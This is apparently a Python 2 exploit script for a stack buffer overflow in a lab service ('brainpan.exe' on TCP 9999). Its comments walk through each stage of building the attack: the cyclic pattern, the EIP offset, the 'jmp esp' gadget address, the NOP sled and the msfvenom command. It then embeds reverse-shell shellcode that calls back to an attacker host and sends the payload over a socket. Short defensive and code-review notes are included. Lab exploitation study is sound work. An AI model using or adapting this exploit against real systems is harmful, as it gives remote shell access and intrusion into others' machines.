"""Stack buffer overflow proof-of-concept for the lab service on TCP 9999.

The author's stage notes (2-crash.py -> 3-pattern.py -> 4-control-eip.py)
are kept below because they document where every value in ``buffer`` comes
from: a 650-byte cyclic pattern, an EIP offset of 524, a ``jmp esp`` gadget
at 0x311712F3 inside brainpan.exe, a 32-byte NOP sled and a 95-byte
msfvenom payload built to exclude the NUL byte.

Python 2 only: ``print`` statements and ``str``-typed byte payloads
(``'\\x..'`` escapes in a plain ``str``); under Python 3 ``s.send(buffer + '\\r\\n')``
would raise ``TypeError`` and the escapes would be decoded as text.
"""
import socket
import sys
from time import sleep  # unused in this stage; leftover from an earlier script

# Stage 3 (cp 2-crash.py 3-pattern.py): cyclic pattern to locate the EIP offset.
# updatedb
# locate pattern_create.rb
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 650
# ``pattern`` is no longer referenced by the final ``buffer`` below.
pattern = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av'

# Bad-character probe from the earlier stage; emptied once the only excluded
# byte (0x00, see the commented-out ``badchars`` buffer below) was known.
# Also no longer referenced by the final ``buffer``.
badchars = (
""
)

# 95 bytes (6 lines of 15 + 5) of msfvenom output; the msfvenom command that
# produced it is recorded just above the ``buffer`` assignment.
shellcode = (
"\xd9\xf7\xd9\x74\x24\xf4\xba\xa9\xde\x67\xfb\x5b\x31\xc9\xb1"
"\x12\x31\x53\x17\x83\xc3\x04\x03\xfa\xcd\x85\x0e\xcd\x2a\xbe"
"\x12\x7e\x8e\x12\xbf\x82\x99\x74\x8f\xe4\x54\xf6\x63\xb1\xd6"
"\xc8\x4e\xc1\x5e\x4e\xa8\xa9\xcc\xa0\x49\x06\x65\xc3\x4d\x59"
"\xce\x4a\xac\xe9\x56\x1d\x7e\x5a\x24\x9e\x09\xbd\x87\x21\x5b"
"\x55\x76\x0d\x2f\xcd\xee\x7e\xe0\x6f\x86\x09\x1d\x3d\x0b\x83"
"\x03\x71\xa0\x5e\x43"
)

# Stage 4 (cp 3-pattern.py 4-control-eip.py): EIP offset from the crash value.
# locate pattern_offset.rb
# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 650 -q 35724134
# [*] Exact match at offset 524
#
# Earlier buffer layouts, kept for the derivation:
# buffer = 'A' * 600
# buffer = pattern
# buffer = 'A' * 524 + 'B' * 4 + 'C' * 122   # 524 + 4 + 122 = 650
# buffer = 'A' * 524 + 'B' * 4 + 'C' * 522   # 122 + 400 = 522
# buffer = 'A' * 524 + 'B' * 4 + badchars    # bad characters: \x00
#
# Gadget lookup:
# locate nasm_shell.rb
# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
# nasm > jmp esp
# 00000000  FFE4              jmp esp
# nasm >
# !mona modules
# !mona find -s "\xff\xe4" -m brainpan.exe
# jmp esp at address 311712F3
# buffer = 'A' * 524 + '\xF3\x12\x17\x31' + 'C' * 522   # jmp esp, little endian
#
# Payload:
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.16.3.47 LPORT=443 -a x86 --platform linux -b '\x00' -f c > shellcode-linux.txt
#
# Layout: 524 bytes of filler, the 4-byte return address (0x311712F3 stored
# little-endian), a 32-byte NOP sled, the 95-byte payload, then padding so the
# total stays at 650 (522 - 32 - 95 = 395).
#
# Defensive note: this only works because the gadget sits at a fixed address and
# the stack is executable, so the service is presumably built without ASLR/PIE
# and without NX/stack protection; the root cause is that the line read from the
# socket is copied into a fixed-size stack buffer without a length check. From a
# detection standpoint the request is distinctive: a single ~650-byte line of
# repeated 'A'/'C' filler around a NOP sled, sent as one write and followed by
# an outbound connection from the host to the LHOST/LPORT recorded above.
buffer = 'A' * 524 + '\xF3\x12\x17\x31' + '\x90' * 32 + shellcode + 'C' * 395 # 522 - 32 - 95

# Target address and port are hard-coded for the author's lab network (the
# LHOST above is the same /24), so this is not runnable anywhere else as-is.
try:
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.settimeout(2)
    s.connect(('172.16.3.19',9999))
    s.recv(1024)  # consume the service banner before sending
    print '[*] Sending buffer.'
    s.send(buffer + '\r\n')
    s.close()
# NOTE(review): the bare ``except:`` swallows every exception, including
# ``KeyboardInterrupt``, and the message is misleading: a timeout in ``recv``
# or an error in ``send`` after a successful connect reports the same
# "could not connect" text. The socket is also never closed on that path.
# ``except socket.error as e:`` with the exception printed, and ``s.close()``
# in a ``finally``, would make failures diagnosable.
except:
    print '[*] Could not connect to target, exiting.'
    sys.exit()